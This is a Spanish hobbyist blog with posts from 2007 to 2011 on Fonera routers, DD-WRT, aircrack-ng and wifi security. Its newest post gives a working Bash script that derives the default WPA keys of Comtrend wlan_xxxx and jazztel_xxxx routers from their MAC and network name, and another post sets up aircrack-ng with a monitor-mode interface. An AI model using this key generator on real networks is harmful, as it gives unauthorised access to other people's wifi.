sábado, 5 de febrero de 2011

WPA Ya no es segura!

Se ha publicado el algoritmo que hace posible conocer las claves por defecto usadas en los routers Comtrend que tienen como patrón el nombre de red wlan_xxxx y jaztel_xxxx.
Sus proveedores son Movistar y Jazztel

La casa Comtrend para obtener la clave WPA usa como patrón la MAC (bssid) del dispositivo i el nombre de la red (essid) combinado con un hash md5sum.

Os dejo el script en Bash que lo hace posible, lo he modificado un poco para que se entender mejor que es lo que hace:

1.- MAC: 64:68:0C:4F:C4:EF
2.- ESSID: wlan_C4EC


[CODIGO]

#!/bin/bash
echo
echo
echo "############### Default KEY's [WPA] wlan_xxxx i jazztel_xxxx #############"
echo
echo
if [ $# -ne 2 ]
then
echo "Usage: $0 "
echo
echo "Ejamplo: $0 WLAN_C58D 64:68:0C:C5:C5:90"
exit 1
fi
HEAD=$(echo -n "$1" | tr 'a-z' 'A-Z' | cut -d_ -f2)
echo $HEAD " ### El nombre de la red - WLAN_ "

BSSID=$(echo -n "$2" | tr 'a-z' 'A-Z' | tr -d :)
echo $BSSID " ### La MAC del router sin puntos "

BSSIDP=$(echo -n "$BSSID" | cut -c-8)
echo $BSSIDP " ### La MAC del router sin los últimos 4 digitos "

KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)
echo
echo " La clave es #####!! $KEY !!#####"
echo
[/CODIGO]

Ya veis que no hace falta ni auditar la red para saber cual es la clave.

Es muy recomendable, si os encontráis con esta tipo de redes en casa, cambiar a WPA2 y combinarlo con una buena clave de seguridad combinado letras (mayúsculas y minúsculas) con números y caracteres especiales.

Este algoritmo fue descubierto por el equipo de cifrados de www.seguridadwireless.net que decidieron no hacerlo público hasta que Comtrend pudiera rectificar.
Posteriormente des de http://www.forocoches.com/foro/ se ha dado con el.

viernes, 24 de octubre de 2008

Fonera en modo Cliente y Repetidor con DD-WRT

Aprovechando la versión final de DD-WRT v24 y por lo tanto mas estable que las anteriores, vamos a ver como configuramos fácilmente la Fonera para usarla como cliente o como repetidora de una señal Wifi.
Primero de todo tenemos que instalar el dd-wrt, podemos ver en entradas anteriores en el blog donde ya se explica.

Una vez instalado accedemos a la configuración web mediante la ip 192.168.1.1
DD-WRT tiene una interfaz web muy intuitiva y muy completa, por lo que podremos configurarlo casi todo desde la misma.

El usuario y contraseña por defecto es:
  • root - admin
Antes de nada podemos poner la interfaz web en castellano, para que nos sea mas facil entenderlo, vamos a:
  • administración --> Lenguaje --> Español

Lo segundo será configurar el rango de ip que utilizaremos para conectarnos a Internet. Nos vamos a:
  • Setup --> Tipo de conexion a internet --> Ip estatica

Aquí configuramos la ip con la que nos vamos a conectar al router, debe estar en el mismo rango. La puerta de enlace (ip del router conectado a internet) Su mascara de red y las DNS.



Aplicamos y grabamos configuración

Ahora vamos a asociarnos con el router o punto de acceso:
  • Estado --> Inalámbrico --> Inspección de sitios
Y nos unimos a la red que queremos conectar.

Automáticamente seremos trasladados a la pestaña


Aquí ponemos en:
  • modo inalámbrico --> Cliente
Los que tengáis dos antenas en la Fonera en donde pone Antena TX y RX, es donde pondréis la antena que mejor os convenga.

Aplicamos y grabamos configuración


Ahora solo falta la encriptación, que debe ser la misma clave que tenéis puesta en el router.
  • Inalámbrico --> Seguridad inalámbrica
En caso de que tengáis una clave WPA, no lo he probado, pero por lo que he leído no debería daros mas problemas.

Pero en caso de WEP esta versión tiene todavía un fallo que no han corregido, y es que desde la configuración web no quedan grabados los datos, por lo que hay que hacerlo desde consola.

Nos dirigimos a:
  • Administración --> Acceso remoto --> activamos SSH Management en el puerto 22
Nos conectamos con el Putty y escribimos:
  • nvram set ath0_key1=”la-clave-en-hexadecimal”
  • nvram commit
  • reboot
Una vez reiniciado, deberíamos tener acceso a Internet desde la Fonera, para ello podemos ir a la sección:

  • Administración --> Disgnósticos --> Comandos --> ping jmarcma.blogspot.com
Si obtenemos ping es que todo está correcto, de lo contrario habrá que revisar los pasos anteriores.

Ahora solo nos falta por configurar una nueva interface para que se pueda repetir la señal.
Volvemos a la pestaña Inalámbrico y añadimos una interfaz virtual.


Damos un nombre a la red o bien en caso de que no queramos que se muestre el essid desactivamos.
  • Broadcast SSID Inalámbrico
Modo Inalámbrico:
  • AP
Aplicamos y grabamos configuración

Por último la encriptación, debemos hacer el mismo paso que hemos echo antes y nos conectamos con el putty:
  • nvram set ath0.1_key1=”la-clave-en-hexadecimal”
  • nvram commit
  • reboot

Podemos configurar el rango de ip's con el que trabajaŕa el wifi, tambien podemos activar el DHCP en:
  • Setup --> Setup básico --> Setup de RED
Ahora deberia aparecer una nueva señal Wifi con el nombre que hemos dado anteriormente y conectado a Internet.



miércoles, 22 de octubre de 2008

Instalar DD-WRT v24 Final en la Fonera


Necesitaremos:

1- El firmware DD-WRT v24 Final Sp1, que lo podemos bajar de aquí.

2- Un cliente tftp server de aquí

3- El Putty

4- La fonera con el redbot instalado, o bien un cable serie para la fonera. Yo prefiero el cable serie, ya que si la cagamos en algún momento este nos puede salvar.


Configuramos nuestra tarjeta de red con la siguiente ip: 192.168.1.3

Abrimos el tftp Server con la conexión local.

Nos conectamos con el putty a la ip de la fonera 192.168.1.1 mediante el puerto 9000, si lo hacemos con el redbot activado. Si lo hacemos desde el cable serie debemos usar la siguiente configuración: 9600 - 8 - 1 – none.


Una vez dentro de la consola debemos establecer la ip que nos va a servirlos archivos i empezamos con la instalación:


ip_address –l 192.168.1.254/24 –h 192.168.1.3

fis init

load –r –v –b 0x80041000 linux.bin

fis create linux (esta parte va a durar bastante ya que instalará el firmware)


Una vez ha finalizado debemos configurar el script que de arranque de la fonera para que nos lea el sistema.

Debemos ir respondiendo o escribiendo a las diferentes preguntas i pulsando enter al finalizar:


fconfig

Run script at boot: true
Boot script:
.. fis load -l vmlinux.bin.l7
.. exec
Enter script, terminate with empty line
>> fis load -l linux
>> exec
>>
Boot script timeout (1000ms resolution): 10
Use BOOTP for network configuration: false
Gateway IP address:
Local IP address:
192.168.1.254
Local IP address mask:
255.255.255.0
Default server IP address:
Console baud rate: 9600

GDB connection port: 9000
Force console for special debug messages:
false
Network debug at boot time:
false
Update RedBoot non-volatile configuration - continue (y/n)? y
… Erase from 0xa87e0000-0xa87f0000:
… Program from 0×80ff0000-0×81000000 at 0xa87e0000: .
RedBoot>reset


Ahora se reinicia la fonera y ya tenemos instalado el DD-wrt v24 final Sp1, para acceder a la configuración web la ip es 192.168.1.1

sábado, 31 de mayo de 2008

Activar ssh en la Fonera

Lo primero de todo es probar con el boton del reset haber si hay suerte y te vuelve a la version enterior que tansolo abria que ejecutar el dropbear

De no ser así:

Configuras tu targeta de red:
  • Con la direccion 169.254.255.x
  • La puerta de enlace: 169.254.255.1
Tienes "engañar" al router para que te de acceso por ssh y poner static ip y ponerle las dns de FON.
Entras por web y te dirijes a Avanced --> Internet conection y configuras un rango de ip's para el wifi, por ejemplo:
  • IP: 192.168.0.3
  • SM: 255.255.255.0
  • P.E: 192.168.0.1
  • DNS: 88.198.165.155
Y guardas.

Luego con la fonera conectada al router con internet, reinicias y te conectas por Wifi con las ip's que hemos configurado antes.
Te conectas con el Putty con la ip 169.254.255.1 por ssh y Voilà ya estas conectado por ssh, entras con admin admin.
Puedes canviar el pasword poniedo: passwd root

Ahora hay que ejecutar dropbear para que cuando se reinicie puedas volver a entrar por ssh.

Lo ultimo que falta:
  1. ln -s /etc/init.d/dropbear /etc/init.d/S50dropbear
  2. vi /etc/firewall.user (y buscas las lineas que hacen referencia al puerto 22 y las comentas)
  3. vi /bin/thinclient (y comentas la ultima linea creo que es y la comentasdebe quedar así # ./tmp/.thinclient
Para poder editar en el editor VI apretas la i
Para comentar usas el caracter #
Y para salir y guardar los cambios ESC :wq

Para la versión 7.1.1 r1 solo ejecutar el Dropbear y añadir las lineas comentadas antes.

jueves, 22 de mayo de 2008

Conversión de dBm a mW o Watts

Convert dBm to Watts

dBm
Watts

dBm
Watts

dBm
Watts
0
1.0 mW

16
40 mW

32
1.6 W
1
1.3 mW

17
50 mW

33
2.0 W
2
1.6 mW

18
63 mW

34
2.5 W
3
2.0 mW

19
79 mW

35
3.2 W
4
2.5 mW

20
100 mW

36
4.0 W
5
3.2 mW

21
126 mW

37
5.0 W
6
4 mW

22
158 mW

38
6.3 W
7
5 mW

23
200 mW

39
8.0 W
8
6 mW

24
250 mW

40
10 W
9
8 mW

25
316 mW

41
13 W
10
10 mW

26
398 mW

42
16 W
11
13 mW

27
500 mW

43
20 W
12
16 mW

28
630 mW

44
25 W
13
20 mW

29
800 mW

45
32 W
14
25 mW

30
1.0 W

46
40 W
15
32 mW

31
1.3 W

47
50 W



Siempre es útil tener a mano una tabla conversión de decibelios a vatios o milivatios, con ella podremos saber la potencia de salida que los fabricantes ponen en los dispositivos Wifi y calcular las distancias en dBi sin problemas.

domingo, 30 de marzo de 2008

Añadir una segunda antena a la Fonera

Vamos a añadir una segunda antena a la Fonera para que una pueda recibir la señal y la otra pueda emitirla. Las imagenes que adjunto estan echas en una Fonera 2100. Proximamente le añadiré a una 2200.

La ventajas de hacer esto, son que ganaremos calidad a la hora de repetir una red, con una antena cojeremos la señal y con la otra la repetiremos.

Primero de todo abrimos la Fonera, y podemos ver donde se encuentra soldado el cable que recoje la antena. En este modelo es fácil ver donde soldar una segunda antena, en el otro modelo tiene alguna complicación mas..

Necesitamos una cacho de cable que en una punta tena un conector RP-SMA (yo he usado uno con conector N que tenia por casa, tambien vale) y en el nada para poder soldarlo a la placa.

Antes de soldar el cable hacemos un pequeño agujero en la Fonera para poder pasar el cable, ya que si en la otra puna tenemos un conector SMA o N no nos pasaria.





Como se ve en la imagen, soldo el vivo en el centro y la masa en uno de los laterales, vigilando de no cruzar uno con otro.

Una vez echo esto ya solo tenemos que configurar el archivo wireless, que esta en:

/etc/config/wireless

Y allí modificamos las opciones siguientes:

option txantenna [numero]
option rxantenna [numero]

txantena es la opcion que la Fonera usa para emitir y rxantena la que usa para recibir. Si nos fijamos en la placa de la Fonera pone un numero en cada sitio (ANT 2 y ANT 1) podremos uno en cada sitio segun nos convengañ


Resultado final.




sábado, 29 de marzo de 2008

Compartir directorio con la Fonera

Para poder compartir el directorio de Windows con la fonera y así poder aumentar la capacidad de la misma o bien usar el Aircrack-ng sin quedarnos sin espacio por las capturas.

Nos bajamos el modulo CIFS de aquí:
http://www.gcd.org/fonera/kmod-fs-cifs_2.4.32-ar531x-1_mips.ipk

O bien desde la misma Fonera en el directorio tmp tecleamos:
wget http://www.gcd.org/fonera/kmod-fs-cifs_2.4.32-ar531x-1_mips.ipk

Ahora lo instalamos con:
ipkg install kmod-fs-cifs_2.4.32-ar531x-1_mips.ipk

Ahora tenemos que montar el directorio. Creamos una carpeta para compartir en la Fonera que se llamará compartido dentro de /mnt, quedará así /mnt/compartido

En Windows hacemos los mismo, la carpeta se llamará shared, le daré los permisos necesarios y la compartiré. La carpeta en Windows la he creado en C: para no tener que escribir tanto Grin

Una vez creadas las montamos:
mount -t cifs //169.254.255.3\\shared /mnt/compartido -o unc=\\\\169.254.255.3\\shared,ip=169.254.255.3,user=marc,pass=****,dom=INICIOMS

La ip corresponde a la que tengo asignada en la tarjeta de red del pc y la carpeta shared es lo que comparto en Windows. Lo demas parece claro, no? directorio en la Fonera /mnt/compartido. Luego solo queda el nombre de usuario en Windows, el pasword y el dominio.

De momento me ha funcionado con cable, con Wifi todavía no.

viernes, 28 de marzo de 2008

Refrigerar la Fonera

El principal problema de la Fonera es su sobrecalentamiento cuando usamos Aircrack-ng o bien otras utilidades. La solución pasa por ponerle un ventilador (con disipador a ser posible) dentro de la Fonera, encima del chip.

La modiificación sale muy barata, yo he comprado los ventiladores en eBay a este vendedor por unos 4 euros.

Abro la Fonera y busco el mejro sitio para poner el ventilador encima del chip Atheros, para sujetarlos he usado un poco de cinta aislante. Luego conecto los cables que trae el ventilador, el positivo en el V5y el negativo en el GND de los puertos serie de la Fonera.


Una vez tapada la Fonera me aseguro de que no se pueda mover el ventilador dentro, ya que sino podria producir un corto circiuto en la placa y dejarla inservible.


Ya por último la hago unos agujeros en la carcasa para facilitar el paso del aire dentro la Fonera y así una mejor refrigeración.


Unas fotos de como ha quedado...






miércoles, 26 de marzo de 2008

Instalar Aircrack-ng en la Fonera con Ponte2

Vamos a ver como instalar Aircrack-ng en la fonera con ponte2.
Primero de todo accedemos a la fonera via ssh, una vez dentro escribimos:

wget http://www.fonera.info/files/ipkg/kamikaze-2.6/libpthread_0.9.28.2-12_mips.ipk
wget http://www.fonera.info/files/ipkg/kamikaze-2.6/aircrack-ptw_1.0.0-1_mips.ipk

Una vez bajados los paquetes los instalamos:

ipkg install libpthread_0.9.28.2-12_mips.ipk
ipkg install aircrack-ptw_1.0.0-1_mips.ipk



Ahora creamos una interfaz nueva en modo monitor:

wlanconfig ath3 create wlandev wifi0 wlanmode monitor
ifconfig ath3 up

Listo! ya podemos usar el Aircrack-ng en la Fonera. Facil, no?

Fonera repetidor con Ponte2

Voy a resumir como poner la Fonera en modo repetidor con Ponte2 siguiendo el sifguiente esquema de red conexion:

Inet___Router-1__-->>(º Wifi º)<<--__Router-2__-->>(º Wifi º)


Una vez se haya iniciada la fonera y con Ponte2 instalado, introducimos en el navegador la puerta de enlace de la Fonera por defecto (169.254.255.1) y nos aparecera la interfaz de Ponte2 junto con la de Fon, por lo que se compartiran las dos interfaces graficas y podremos usar la de Fon ya que queda intacta.




Ahora vamos a configrarla para que nos recoja la señal por Wifi y la repita por tal. Entramos en Ponte2 Client mode repeat AP.




En la primera parte es donde guardamos la configuración que realizaremos (save as profile name:) y para que las proximas veces que arranque la fonera nos inicie con la ultima configuración marcaremos la opcion (make a service). Además hay otra opción mas abajo que permite arrancar directamente la configuración que tengamos guardada sin tener que configurarlo todo de nuevo.



En la siguiente pestaña es donde configuramos los datos del router al cual queremos repetir la señal, el ESSID y la clave WEP en hexadecimal. Aunque hay que decir que alguna veces me falla con el essid, la manera infalible el conectarlo esv mediante la mac, que hasta ahora no me ha fallado. tengo que decir tambien que no lo he probado con WPA, tansolo con claves WEP.



Nos vamos a client link donde configuramos los datos ip para conectarnos al router como clientes. Yo uso siempre ip fija ya que prefiero tener el DHCP desactiva en el router principal



En la pestaña repeater_ap, es donde configuramos los datos que va a repetir la fonera. Podemos tener un essid del que vamos a repetir, yo lo tengo así.
Luego se pone el rango de ip's que va a utilizar la fonera para que se conecten clientes y si queremos activar el DHCP. Recordar que tiene que ser un rango diferente al que estamos conectados al router principal. Y finalmente y muy importante es poner la misma clave pero en ASCII, ya que no he sido capaz de repetir una señal con una clave diferente.



Luego ya solo nos queda configurar la interfaz eth0 en caso de que tambien queramos que la fonera haga de cliente bridge mediante ethernet.



Hay una opcion para activar FON, aunque yo taodavia no la he usado.. esta por probar.

La última opción es la de abrir los puertos:

Hay que poner la ip del pc que va a utilizar p2p

El numero de puerto con el protocolo correspondiente.



Guardamos los cambios y nos aparecerá una especie de consola que noos irá dicendo los pasos que hace, hasta que nos conecte.

jueves, 6 de marzo de 2008

Instalar Ponte2 en la Fonera



La Fonera es un router que sirve Fon y con el cual podemos sacarle mucho provecho. Entre otras cosas podemos usarlo como repetidor universal de otra señal Wifi, como modo cliente de otra señal Wifi o bien usarlo para añadir una señal Wifi a nuestro router (en caso de no tener). La Fonera viene con un sistema operativo Linux embedido y basado en OpenWrt ya instalado. Ponte2 es un conjunto de scripts (creados por antonio Anselmi) con los cuales podemos hacer facilmente este tipo de configuraciones sin necesidad de programar los scripts a "pelo", tiene un interfaz web que nos facilita mucho el trabajo.

Vamos a ver como lo hacemos para instalarlo:

Lo primero de todo necesitamos tener acceso a la fonera mediante ssh, para así trabajar en linea de comandos.
Lo siguiente será descargarnos Ponte2 para luego instalarlo en la Fonera
cd /tmp
wget http://downloads.sourceforge.net/ponte2/ponte2-20070
627.tar.gz

cd /
tar xzvf /tmp/ponte2-20070627.tar.gz
reboot
Si no tenemos acceso a internet con la Fonera podemos acceder a mediante SCP (con el programa WinSCP) y así obtener acceso al los directorios de forma grafica y transferir cualquier archivo desde el Windows.

La proxima vez que arranquemos la Fonera ya estara Ponte2 funcionando dentro de ella.
Accedemos a ella mediante targeta de red con la ip 169.254.255.1 o bien por Wifi 192.168.10.1

viernes, 28 de diciembre de 2007

Guia: Cómo proteger un router Wifi

Bueno pues voy a empezar este blog con uno de los manuales que tengo colgado en la pagina www.emule.us de la cual soy administrador.
Este mini tutorial pretende proteger a un router Wifi de las posibles intrusiones, que son muchas a dia de hoy, pero eso es un tema que mas adelante irémos hablando.

Algo que viene siendo habitual, y sobretodo en comunidades de vecinos, es detectar varias redes wireless de nuestros vecinos y pudiendo introducirnos en ellas sin seguridad ninguna, con los riegos que eso conlleva en caso de que seamos nosotros los proveedores de los demás .
  1. Nos aseguraremos de que nuestros datos no sean accesibles a qualquiera.

    Pasos a seguir:
    Lo primero de todo es cambiar la clave y el usuario de acceso al router, lo podemos hacer a través del navegador web. Con ello evitaremos que cualquiera que pueda saber la clave de serie pueda acceder a la configuració del router a través del navegador o bien por Telnet.
    • Desactivaremos el DHCP Server, con ello conseguimos que qualquiera que pueda conectarse, el router no le asigne automaticamente una ip. Este es el servicio que se encarga de asignar automáticamente las ip’s por lo que si lo desactivamos, deberemos asignar manualmente las ip’s a todos los pc’s que tengamos conectados. Una buena solucion a parte de desactivar el DHCP, es cambiar la dirección ip del router que trae por defecto, con ello conseguiremos que sea mas difícil saber la direccion ip del router y con ello conectarse a él.
    • Desactivar el ESSID, el ESSID es el que hace público el nombre de nuestra red, en el router viene de serie el nombre del router, por lo que con la mayoría de sniffers Wifi detectan la el nombre del router, es importante ya que sabiendo la marca del router, podemos saber muchas cosas. Algunos routers tienen la opción de desactivar el essid, si es nuestro caso lo hacemos, de esta manera lograremos evitar que otros usuarios puedan ver la existencia de nuestra red ya que restara oculta.
    • El filtrado MAC, las MAC son el número único que identifican las tarjetas de red de cada computadora, con el filtrado MAC conseguiremos que solo accedan a la red las MAC que nosotros hayamos previamente introducido en el router. Para ver nuestra MAC, podemos ir en al ejecutador de comandos (inicio-->ejecutar-->cmd) y introducimos el comando ipconfig /all.
    Siguiendo estos 4 pasos, evitaremos que cualquiera que detecte nuestra red encuentre dificultades para poder conectarse.
  1. Y Por Último y Mas Importante Encriptar La Red
    • Tipos de encriptación que existen:
    • WEP(Wired Equivalent Privacy)
      La encriptación usa un sistema de claves. La clave de la tarjeta de red del ordenador debe coincidir con la clave del router. Hay dos niveles: encriptación de 64 bits (hasta 10 caracteres ASCI ) y la de 128 bits (26 caracteres ASCI ). Cuanto mayor sea la clave mas difícil será de desencriptar. Lo mas seguro será ir introduciendo las claves manualmente y luego guardarlas en algún papel claro esta, para que coincidan con las que introduzcamos luego en las respectivas tarjetas de red. (este metodo de encriptación deja mucho que desear, hay varios metodos efectivos para descubrir la clave)
    • WPA (Wireless Protected Access)
      Ofrece dos tipos de seguridad, con servidor de seguridad y sin servidor. Este método se basa en tener una clave compartida que puede variarde 8 a 63 caracteres ASCI (lo mas seguro es utilizar todo tipos de caracteres) para todos los puestos de la red (Sin servidor) WPA-PSK o disponer de un cambio dinámico de claves entre estos puestos (Con servidor) WPA .Es una opción más segura, pero no todos los dispositivos wireless lo soportan.
  2. Aqui os dejo un generador de passwords.
  3. Es importante seguir los pasos anteriores, ya que existen vulnerabilidades en los dos métodos de encriptación.
  4. Dependiendo del router cada uno tendrá una configuración especifica.